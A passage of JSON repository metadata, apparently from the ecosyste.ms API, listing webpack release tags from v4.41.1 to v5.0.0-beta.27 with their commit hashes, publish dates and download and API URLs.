e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/